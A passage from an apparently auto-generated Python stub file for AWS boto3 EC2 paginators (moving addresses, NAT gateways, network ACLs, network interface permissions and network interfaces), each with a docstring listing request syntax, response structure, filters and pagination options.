- **CreateTime** *(datetime) --*
The time launch template was created.
- **CreatedBy** *(string) --*
The principal that created the launch template.
- **DefaultVersionNumber** *(integer) --*
The version number of the default version of the launch template.
- **LatestVersionNumber** *(integer) --*
The version number of the latest version of the launch template.
- **Tags** *(list) --*
The tags for the launch template.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type LaunchTemplateIds: list
:param LaunchTemplateIds:
One or more launch template IDs.
- *(string) --*
:type LaunchTemplateNames: list
:param LaunchTemplateNames:
One or more launch template names.
- *(string) --*
:type Filters: list
:param Filters:
One or more filters.
* ``create-time`` - The time the launch template was created.
* ``launch-template-name`` - The name of the launch template.
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeMovingAddresses(Paginator):
def paginate(self, Filters: List = None, DryRun: bool = None, PublicIps: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_moving_addresses`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeMovingAddresses>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
PublicIps=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'MovingAddressStatuses': [
{
'MoveStatus': 'movingToVpc'|'restoringToClassic',
'PublicIp': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **MovingAddressStatuses** *(list) --*
The status for each Elastic IP address.
- *(dict) --*
Describes the status of a moving Elastic IP address.
- **MoveStatus** *(string) --*
The status of the Elastic IP address that's being moved to the EC2-VPC platform, or restored to the EC2-Classic platform.
- **PublicIp** *(string) --*
The Elastic IP address.
:type Filters: list
:param Filters:
One or more filters.
* ``moving-status`` - The status of the Elastic IP address (``MovingToVpc`` | ``RestoringToClassic`` ).
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PublicIps: list
:param PublicIps:
One or more Elastic IP addresses.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeNatGateways(Paginator):
def paginate(self, Filters: List = None, NatGatewayIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_nat_gateways`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeNatGateways>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
NatGatewayIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'NatGateways': [
{
'CreateTime': datetime(2015, 1, 1),
'DeleteTime': datetime(2015, 1, 1),
'FailureCode': 'string',
'FailureMessage': 'string',
'NatGatewayAddresses': [
{
'AllocationId': 'string',
'NetworkInterfaceId': 'string',
'PrivateIp': 'string',
'PublicIp': 'string'
},
],
'NatGatewayId': 'string',
'ProvisionedBandwidth': {
'ProvisionTime': datetime(2015, 1, 1),
'Provisioned': 'string',
'RequestTime': datetime(2015, 1, 1),
'Requested': 'string',
'Status': 'string'
},
'State': 'pending'|'failed'|'available'|'deleting'|'deleted',
'SubnetId': 'string',
'VpcId': 'string',
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **NatGateways** *(list) --*
Information about the NAT gateways.
- *(dict) --*
Describes a NAT gateway.
- **CreateTime** *(datetime) --*
The date and time the NAT gateway was created.
- **DeleteTime** *(datetime) --*
The date and time the NAT gateway was deleted, if applicable.
- **FailureCode** *(string) --*
If the NAT gateway could not be created, specifies the error code for the failure. (``InsufficientFreeAddressesInSubnet`` | ``Gateway.NotAttached`` | ``InvalidAllocationID.NotFound`` | ``Resource.AlreadyAssociated`` | ``InternalError`` | ``InvalidSubnetID.NotFound`` )
- **FailureMessage** *(string) --*
If the NAT gateway could not be created, specifies the error message for the failure, that corresponds to the error code.
* For InsufficientFreeAddressesInSubnet: "Subnet has insufficient free addresses to create this NAT gateway"
* For Gateway.NotAttached: "Network vpc-xxxxxxxx has no Internet gateway attached"
* For InvalidAllocationID.NotFound: "Elastic IP address eipalloc-xxxxxxxx could not be associated with this NAT gateway"
* For Resource.AlreadyAssociated: "Elastic IP address eipalloc-xxxxxxxx is already associated"
* For InternalError: "Network interface eni-xxxxxxxx, created and used internally by this NAT gateway is in an invalid state. Please try again."
* For InvalidSubnetID.NotFound: "The specified subnet subnet-xxxxxxxx does not exist or could not be found."
- **NatGatewayAddresses** *(list) --*
Information about the IP addresses and network interface associated with the NAT gateway.
- *(dict) --*
Describes the IP addresses and network interface associated with a NAT gateway.
- **AllocationId** *(string) --*
The allocation ID of the Elastic IP address that's associated with the NAT gateway.
- **NetworkInterfaceId** *(string) --*
The ID of the network interface associated with the NAT gateway.
- **PrivateIp** *(string) --*
The private IP address associated with the Elastic IP address.
- **PublicIp** *(string) --*
The Elastic IP address associated with the NAT gateway.
- **NatGatewayId** *(string) --*
The ID of the NAT gateway.
- **ProvisionedBandwidth** *(dict) --*
Reserved. If you need to sustain traffic greater than the `documented limits <https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-nat-gateway.html>`__ , contact us through the `Support Center <https://console.aws.amazon.com/support/home?>`__ .
- **ProvisionTime** *(datetime) --*
Reserved. If you need to sustain traffic greater than the `documented limits <https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-nat-gateway.html>`__ , contact us through the `Support Center <https://console.aws.amazon.com/support/home?>`__ .
- **Provisioned** *(string) --*
Reserved. If you need to sustain traffic greater than the `documented limits <https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-nat-gateway.html>`__ , contact us through the `Support Center <https://console.aws.amazon.com/support/home?>`__ .
- **RequestTime** *(datetime) --*
Reserved. If you need to sustain traffic greater than the `documented limits <https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-nat-gateway.html>`__ , contact us through the `Support Center <https://console.aws.amazon.com/support/home?>`__ .
- **Requested** *(string) --*
Reserved. If you need to sustain traffic greater than the `documented limits <https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-nat-gateway.html>`__ , contact us through the `Support Center <https://console.aws.amazon.com/support/home?>`__ .
- **Status** *(string) --*
Reserved. If you need to sustain traffic greater than the `documented limits <https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-nat-gateway.html>`__ , contact us through the `Support Center <https://console.aws.amazon.com/support/home?>`__ .
- **State** *(string) --*
The state of the NAT gateway.
* ``pending`` : The NAT gateway is being created and is not ready to process traffic.
* ``failed`` : The NAT gateway could not be created. Check the ``failureCode`` and ``failureMessage`` fields for the reason.
* ``available`` : The NAT gateway is able to process traffic. This status remains until you delete the NAT gateway, and does not indicate the health of the NAT gateway.
* ``deleting`` : The NAT gateway is in the process of being terminated and may still be processing traffic.
* ``deleted`` : The NAT gateway has been terminated and is no longer processing traffic.
- **SubnetId** *(string) --*
The ID of the subnet in which the NAT gateway is located.
- **VpcId** *(string) --*
The ID of the VPC in which the NAT gateway is located.
- **Tags** *(list) --*
The tags for the NAT gateway.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
:type Filters: list
:param Filters:
One or more filters.
* ``nat-gateway-id`` - The ID of the NAT gateway.
* ``state`` - The state of the NAT gateway (``pending`` | ``failed`` | ``available`` | ``deleting`` | ``deleted`` ).
* ``subnet-id`` - The ID of the subnet in which the NAT gateway resides.
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
* ``vpc-id`` - The ID of the VPC in which the NAT gateway resides.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type NatGatewayIds: list
:param NatGatewayIds:
One or more NAT gateway IDs.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeNetworkAcls(Paginator):
def paginate(self, Filters: List = None, DryRun: bool = None, NetworkAclIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_network_acls`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeNetworkAcls>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
NetworkAclIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'NetworkAcls': [
{
'Associations': [
{
'NetworkAclAssociationId': 'string',
'NetworkAclId': 'string',
'SubnetId': 'string'
},
],
'Entries': [
{
'CidrBlock': 'string',
'Egress': True|False,
'IcmpTypeCode': {
'Code': 123,
'Type': 123
},
'Ipv6CidrBlock': 'string',
'PortRange': {
'From': 123,
'To': 123
},
'Protocol': 'string',
'RuleAction': 'allow'|'deny',
'RuleNumber': 123
},
],
'IsDefault': True|False,
'NetworkAclId': 'string',
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'VpcId': 'string',
'OwnerId': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **NetworkAcls** *(list) --*
Information about one or more network ACLs.
- *(dict) --*
Describes a network ACL.
- **Associations** *(list) --*
Any associations between the network ACL and one or more subnets
- *(dict) --*
Describes an association between a network ACL and a subnet.
- **NetworkAclAssociationId** *(string) --*
The ID of the association between a network ACL and a subnet.
- **NetworkAclId** *(string) --*
The ID of the network ACL.
- **SubnetId** *(string) --*
The ID of the subnet.
- **Entries** *(list) --*
One or more entries (rules) in the network ACL.
- *(dict) --*
Describes an entry in a network ACL.
- **CidrBlock** *(string) --*
The IPv4 network range to allow or deny, in CIDR notation.
- **Egress** *(boolean) --*
Indicates whether the rule is an egress rule (applied to traffic leaving the subnet).
- **IcmpTypeCode** *(dict) --*
ICMP protocol: The ICMP type and code.
- **Code** *(integer) --*
The ICMP code. A value of -1 means all codes for the specified ICMP type.
- **Type** *(integer) --*
The ICMP type. A value of -1 means all types.
- **Ipv6CidrBlock** *(string) --*
The IPv6 network range to allow or deny, in CIDR notation.
- **PortRange** *(dict) --*
TCP or UDP protocols: The range of ports the rule applies to.
- **From** *(integer) --*
The first port in the range.
- **To** *(integer) --*
The last port in the range.
- **Protocol** *(string) --*
The protocol number. A value of "-1" means all protocols.
- **RuleAction** *(string) --*
Indicates whether to allow or deny the traffic that matches the rule.
- **RuleNumber** *(integer) --*
The rule number for the entry. ACL entries are processed in ascending order by rule number.
- **IsDefault** *(boolean) --*
Indicates whether this is the default network ACL for the VPC.
- **NetworkAclId** *(string) --*
The ID of the network ACL.
- **Tags** *(list) --*
Any tags assigned to the network ACL.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **VpcId** *(string) --*
The ID of the VPC for the network ACL.
- **OwnerId** *(string) --*
The ID of the AWS account that owns the network ACL.
:type Filters: list
:param Filters:
One or more filters.
* ``association.association-id`` - The ID of an association ID for the ACL.
* ``association.network-acl-id`` - The ID of the network ACL involved in the association.
* ``association.subnet-id`` - The ID of the subnet involved in the association.
* ``default`` - Indicates whether the ACL is the default network ACL for the VPC.
* ``entry.cidr`` - The IPv4 CIDR range specified in the entry.
* ``entry.icmp.code`` - The ICMP code specified in the entry, if any.
* ``entry.icmp.type`` - The ICMP type specified in the entry, if any.
* ``entry.ipv6-cidr`` - The IPv6 CIDR range specified in the entry.
* ``entry.port-range.from`` - The start of the port range specified in the entry.
* ``entry.port-range.to`` - The end of the port range specified in the entry.
* ``entry.protocol`` - The protocol specified in the entry (``tcp`` | ``udp`` | ``icmp`` or a protocol number).
* ``entry.rule-action`` - Allows or denies the matching traffic (``allow`` | ``deny`` ).
* ``entry.rule-number`` - The number of an entry (in other words, rule) in the set of ACL entries.
* ``network-acl-id`` - The ID of the network ACL.
* ``owner-id`` - The ID of the AWS account that owns the network ACL.
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
* ``vpc-id`` - The ID of the VPC for the network ACL.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type NetworkAclIds: list
:param NetworkAclIds:
One or more network ACL IDs.
Default: Describes all your network ACLs.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeNetworkInterfacePermissions(Paginator):
def paginate(self, NetworkInterfacePermissionIds: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_network_interface_permissions`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeNetworkInterfacePermissions>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
NetworkInterfacePermissionIds=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'NetworkInterfacePermissions': [
{
'NetworkInterfacePermissionId': 'string',
'NetworkInterfaceId': 'string',
'AwsAccountId': 'string',
'AwsService': 'string',
'Permission': 'INSTANCE-ATTACH'|'EIP-ASSOCIATE',
'PermissionState': {
'State': 'pending'|'granted'|'revoking'|'revoked',
'StatusMessage': 'string'
}
},
],
}
**Response Structure**
- *(dict) --*
Contains the output for DescribeNetworkInterfacePermissions.
- **NetworkInterfacePermissions** *(list) --*
The network interface permissions.
- *(dict) --*
Describes a permission for a network interface.
- **NetworkInterfacePermissionId** *(string) --*
The ID of the network interface permission.
- **NetworkInterfaceId** *(string) --*
The ID of the network interface.
- **AwsAccountId** *(string) --*
The AWS account ID.
- **AwsService** *(string) --*
The AWS service.
- **Permission** *(string) --*
The type of permission.
- **PermissionState** *(dict) --*
Information about the state of the permission.
- **State** *(string) --*
The state of the permission.
- **StatusMessage** *(string) --*
A status message, if applicable.
:type NetworkInterfacePermissionIds: list
:param NetworkInterfacePermissionIds:
One or more network interface permission IDs.
- *(string) --*
:type Filters: list
:param Filters:
One or more filters.
* ``network-interface-permission.network-interface-permission-id`` - The ID of the permission.
* ``network-interface-permission.network-interface-id`` - The ID of the network interface.
* ``network-interface-permission.aws-account-id`` - The AWS account ID.
* ``network-interface-permission.aws-service`` - The AWS service.
* ``network-interface-permission.permission`` - The type of permission (``INSTANCE-ATTACH`` | ``EIP-ASSOCIATE`` ).
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeNetworkInterfaces(Paginator):
def paginate(self, Filters: List = None, DryRun: bool = None, NetworkInterfaceIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_network_interfaces`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeNetworkInterfaces>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
NetworkInterfaceIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'NetworkInterfaces': [
{
'Association': {
'AllocationId': 'string',
'AssociationId': 'string',
'IpOwnerId': 'string',
'PublicDnsName': 'string',
'PublicIp': 'string'
},
'Attachment': {
'AttachTime': datetime(2015, 1, 1),
'AttachmentId': 'string',
'DeleteOnTermination': True|False,
'DeviceIndex': 123,
'InstanceId': 'string',
'InstanceOwnerId': 'string',
'Status': 'attaching'|'attached'|'detaching'|'detached'
},
'AvailabilityZone': 'string',
'Description': 'string',
'Groups': [
{
'GroupName': 'string',
'GroupId': 'string'
},
],
'InterfaceType': 'interface'|'natGateway'|'efa',
'Ipv6Addresses': [
{
'Ipv6Address': 'string'
},
],
'MacAddress': 'string',
'NetworkInterfaceId': 'string',
'OwnerId': 'string',
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string',
'PrivateIpAddresses': [
{
'Association': {
'AllocationId': 'string',
'AssociationId': 'string',
'IpOwnerId': 'string',
'PublicDnsName': 'string',
'PublicIp': 'string'
},
'Primary': True|False,
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string'
},
],
'RequesterId': 'string',
'RequesterManaged': True|False,
'SourceDestCheck': True|False,
'Status': 'available'|'associated'|'attaching'|'in-use'|'detaching',
'SubnetId': 'string',
'TagSet': [
{
'Key': 'string',
'Value': 'string'
},
],
'VpcId': 'string'
},
],
}
**Response Structure**
- *(dict) --*
Contains the output of DescribeNetworkInterfaces.
- **NetworkInterfaces** *(list) --*
Information about one or more network interfaces.
- *(dict) --*
Describes a network interface.
- **Association** *(dict) --*
The association information for an Elastic IP address (IPv4) associated with the network interface.
- **AllocationId** *(string) --*
The allocation ID.
- **AssociationId** *(string) --*
The association ID.
- **IpOwnerId** *(string) --*
The ID of the Elastic IP address owner.
- **PublicDnsName** *(string) --*
The public DNS name.
- **PublicIp** *(string) --*
The address of the Elastic IP address bound to the network interface.
- **Attachment** *(dict) --*
The network interface attachment.
- **AttachTime** *(datetime) --*
The timestamp indicating when the attachment initiated.
- **AttachmentId** *(string) --*
The ID of the network interface attachment.
- **DeleteOnTermination** *(boolean) --*
Indicates whether the network interface is deleted when the instance is terminated.
- **DeviceIndex** *(integer) --*
The device index of the network interface attachment on the instance.
- **InstanceId** *(string) --*
The ID of the instance.
- **InstanceOwnerId** *(string) --*
The AWS account ID of the owner of the instance.
- **Status** *(string) --*
The attachment state.
- **AvailabilityZone** *(string) --*
The Availability Zone.
- **Description** *(string) --*
A description.
- **Groups** *(list) --*
Any security groups for the network interface.
- *(dict) --*
Describes a security group.
- **GroupName** *(string) --*
The name of the security group.
- **GroupId** *(string) --*
The ID of the security group.
- **InterfaceType** *(string) --*
The type of network interface.
- **Ipv6Addresses** *(list) --*
The IPv6 addresses associated with the network interface.
- *(dict) --*
Describes an IPv6 address associated with a network interface.
- **Ipv6Address** *(string) --*
The IPv6 address.
- **MacAddress** *(string) --*
The MAC address.
- **NetworkInterfaceId** *(string) --*
The ID of the network interface.
- **OwnerId** *(string) --*
The AWS account ID of the owner of the network interface.
- **PrivateDnsName** *(string) --*
The private DNS name.
- **PrivateIpAddress** *(string) --*
The IPv4 address of the network interface within the subnet.
- **PrivateIpAddresses** *(list) --*
The private IPv4 addresses associated with the network interface.
- *(dict) --*
Describes the private IPv4 address of a network interface.
- **Association** *(dict) --*
The association information for an Elastic IP address (IPv4) associated with the network interface.
- **AllocationId** *(string) --*
The allocation ID.
- **AssociationId** *(string) --*
The association ID.
- **IpOwnerId** *(string) --*
The ID of the Elastic IP address owner.
- **PublicDnsName** *(string) --*
The public DNS name.
- **PublicIp** *(string) --*
The address of the Elastic IP address bound to the network interface.
- **Primary** *(boolean) --*
Indicates whether this IPv4 address is the primary private IPv4 address of the network interface.
- **PrivateDnsName** *(string) --*
The private DNS name.
- **PrivateIpAddress** *(string) --*
The private IPv4 address.
- **RequesterId** *(string) --*
The ID of the entity that launched the instance on your behalf (for example, AWS Management Console or Auto Scaling).
- **RequesterManaged** *(boolean) --*
Indicates whether the network interface is being managed by AWS.
- **SourceDestCheck** *(boolean) --*
Indicates whether traffic to or from the instance is validated.
- **Status** *(string) --*
The status of the network interface.
- **SubnetId** *(string) --*
The ID of the subnet.
- **TagSet** *(list) --*
Any tags assigned to the network interface.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **VpcId** *(string) --*
The ID of the VPC.
:type Filters: list
:param Filters:
One or more filters.
* ``addresses.private-ip-address`` - The private IPv4 addresses associated with the network interface.
* ``addresses.primary`` - Whether the private IPv4 address is the primary IP address associated with the network interface.
* ``addresses.association.public-ip`` - The association ID returned when the network interface was associated with the Elastic IP address (IPv4).
* ``addresses.association.owner-id`` - The owner ID of the addresses associated with the network interface.
* ``association.association-id`` - The association ID returned when the network interface was associated with an IPv4 address.
* ``association.allocation-id`` - The allocation ID returned when you allocated the Elastic IP address (IPv4) for your network interface.
* ``association.ip-owner-id`` - The owner of the Elastic IP address (IPv4) associated with the network interface.
* ``association.public-ip`` - The address of the Elastic IP address (IPv4) bound to the network interface.
* ``association.public-dns-name`` - The public DNS name for the network interface (IPv4).
* ``attachment.attachment-id`` - The ID of the interface attachment.
* ``attachment.attach.time`` - The time that the network interface was attached to an instance.
* ``attachment.delete-on-termination`` - Indicates whether the attachment is deleted when an instance is terminated.
* ``attachment.device-index`` - The device index to which the network interface is attached.
* ``attachment.instance-id`` - The ID of the instance to which the network interface is attached.
* ``attachment.instance-owner-id`` - The owner ID of the instance to which the network interface is attached.
* ``attachment.nat-gateway-id`` - The ID of the NAT gateway to which the network interface is attached.
* ``attachment.status`` - The status of the attachment (``attaching`` | ``attached`` | ``detaching`` | ``detached`` ).
* ``availability-zone`` - The Availability Zone of the network interface.
* ``description`` - The description of the network interface.
* ``group-id`` - The ID of a security group associated with the network interface.
* ``group-name`` - The name of a security group associated with the network interface.
* ``ipv6-addresses.ipv6-address`` - An IPv6 address associated with the network interface.
* ``mac-address`` - The MAC address of the network interface.
* ``network-interface-id`` - The ID of the network interface.
* ``owner-id`` - The AWS account ID of the network interface owner.
* ``private-ip-address`` - The private IPv4 address or addresses of the network interface.
* ``private-dns-name`` - The private DNS name of the network interface (IPv4).
* ``requester-id`` - The ID of the entity that launched the instance on your behalf (for example, AWS Management Console, Auto Scaling, and so on).
* ``requester-managed`` - Indicates whether the network interface is being managed by an AWS service (for example, AWS Management Console, Auto Scaling, and so on).
* ``source-dest-check`` - Indicates whether the network interface performs source/destination checking. A value of ``true`` means checking is enabled, and ``false`` means checking is disabled. The value must be ``false`` for the network interface to perform network address translation (NAT) in your VPC.
* ``status`` - The status of the network interface. If the network interface is not attached to an instance, the status is ``available`` ; if a network interface is attached to an instance the status is ``in-use`` .
* ``subnet-id`` - The ID of the subnet for the network interface.
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
* ``vpc-id`` - The ID of the VPC for the network interface.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type NetworkInterfaceIds: list
:param NetworkInterfaceIds:
One or more network interface IDs.
Default: Describes all your network interfaces.
- *(string) --*
:type PaginationConfig: dict
